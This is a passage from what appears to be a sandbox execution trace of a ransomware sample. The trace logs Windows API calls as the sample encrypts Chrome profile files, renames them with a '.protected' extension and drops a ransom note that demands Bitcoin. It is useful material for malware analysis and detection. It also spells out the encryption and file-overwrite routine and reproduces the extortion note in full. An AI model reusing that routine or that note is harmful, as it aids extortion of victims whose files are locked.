(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.066] WriteFile (in: hFile=0x160, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0084.066] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.066] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0084.066] CloseHandle (hObject=0x160) returned 1 [0084.066] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0084.066] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0084.066] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\RESTORE_FILES.txt") returned 156 [0084.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.067] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.067] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0084.068] lstrlenA (lpString="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") returned 684 [0084.068] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.068] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.068] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0084.068] CloseHandle (hObject=0x15c) returned 1 [0084.069] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0084.069] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0084.069] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\RESTORE_FILES.txt") returned 141 [0084.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.069] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.069] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0084.070] lstrlenA (lpString="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") returned 684 [0084.070] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0084.070] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.070] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.070] CloseHandle (hObject=0x158) returned 1 [0084.070] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0084.070] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0084.070] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\RESTORE_FILES.txt") returned 108 [0084.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.071] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.071] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0084.071] lstrlenA (lpString="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") returned 684 [0084.071] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.072] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.072] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.072] CloseHandle (hObject=0x154) returned 1 [0084.072] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.072] lstrcmpiW (lpString1="Favicons", lpString2="Windows") returned -1 [0084.072] lstrcmpiW (lpString1="Favicons", lpString2="Program Files") returned -1 [0084.072] lstrcmpiW (lpString1="Favicons", lpString2="Program Files (x86)") returned -1 [0084.072] lstrcmpiW (lpString1="Favicons", lpString2="$Recycle.bin") returned 1 [0084.072] lstrcmpiW (lpString1="Favicons", lpString2="System Volume Information") returned -1 [0084.072] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons") returned 88 [0084.072] StrStrIW (lpFirst="Favicons", lpSrch=".protected") returned 0x0 [0084.072] lstrcmpW (lpString1="Favicons", lpString2="RESTORE_FILES.txt") returned -1 [0084.072] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.072] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons") returned 88 [0084.072] StrStrW (lpFirst="Favicons", lpSrch=".txt") returned 0x0 [0084.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons") returned 88 [0084.072] StrStrW (lpFirst="Favicons", lpSrch=".rar") returned 0x0 [0084.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons") returned 88 [0084.072] StrStrW (lpFirst="Favicons", lpSrch=".zip") returned 0x0 [0084.072] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.086] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.086] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.087] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.087] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.087] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.087] CloseHandle (hObject=0x154) returned 1 [0084.088] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons.protected") returned 98 [0084.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons.protected")) returned 1 [0084.089] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.089] lstrcmpiW (lpString1="Favicons-journal", lpString2="Windows") returned -1 [0084.089] lstrcmpiW (lpString1="Favicons-journal", lpString2="Program Files") returned -1 [0084.089] lstrcmpiW (lpString1="Favicons-journal", lpString2="Program Files (x86)") returned -1 [0084.089] lstrcmpiW (lpString1="Favicons-journal", lpString2="$Recycle.bin") returned 1 [0084.089] lstrcmpiW (lpString1="Favicons-journal", lpString2="System Volume Information") returned -1 [0084.089] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal") returned 96 [0084.089] StrStrIW (lpFirst="Favicons-journal", lpSrch=".protected") returned 0x0 [0084.089] lstrcmpW (lpString1="Favicons-journal", lpString2="RESTORE_FILES.txt") returned -1 [0084.089] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.089] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons-journal"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal") returned 96 [0084.090] StrStrW (lpFirst="Favicons-journal", lpSrch=".txt") returned 0x0 [0084.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal") returned 96 [0084.090] StrStrW (lpFirst="Favicons-journal", lpSrch=".rar") returned 0x0 [0084.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal") returned 96 [0084.090] StrStrW (lpFirst="Favicons-journal", lpSrch=".zip") returned 0x0 [0084.090] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.090] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.090] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.090] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.090] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.091] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.091] CloseHandle (hObject=0x154) returned 1 [0084.092] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal.protected") returned 106 [0084.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons-journal.protected")) returned 1 [0084.092] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.092] lstrcmpiW (lpString1="Google Profile.ico", lpString2="Windows") returned -1 [0084.092] lstrcmpiW (lpString1="Google Profile.ico", lpString2="Program Files") returned -1 [0084.092] lstrcmpiW (lpString1="Google Profile.ico", lpString2="Program Files (x86)") returned -1 [0084.092] lstrcmpiW (lpString1="Google Profile.ico", lpString2="$Recycle.bin") returned 1 [0084.092] lstrcmpiW (lpString1="Google Profile.ico", lpString2="System Volume Information") returned -1 [0084.092] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico") returned 98 [0084.092] StrStrIW (lpFirst="Google Profile.ico", lpSrch=".protected") returned 0x0 [0084.092] lstrcmpW (lpString1="Google Profile.ico", lpString2="RESTORE_FILES.txt") returned -1 [0084.092] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 
[0084.093] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico") returned 98 [0084.093] StrStrW (lpFirst="Google Profile.ico", lpSrch=".txt") returned 0x0 [0084.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico") returned 98 [0084.093] StrStrW (lpFirst="Google Profile.ico", lpSrch=".rar") returned 0x0 [0084.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico") returned 98 [0084.093] StrStrW (lpFirst="Google Profile.ico", lpSrch=".zip") returned 0x0 [0084.093] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.102] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.102] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.103] SetFilePointerEx (in: 
hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.103] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.104] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.104] CloseHandle (hObject=0x154) returned 1 [0084.105] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.protected") returned 108 [0084.105] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico.protected")) returned 1 [0084.105] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.105] lstrcmpiW (lpString1="History", lpString2="Windows") returned -1 [0084.105] lstrcmpiW (lpString1="History", lpString2="Program Files") returned -1 [0084.106] lstrcmpiW (lpString1="History", lpString2="Program Files (x86)") returned -1 [0084.106] lstrcmpiW (lpString1="History", lpString2="$Recycle.bin") returned 1 [0084.106] lstrcmpiW (lpString1="History", lpString2="System Volume Information") returned -1 [0084.106] wnsprintfW (in: pszDest=0x514c90, 
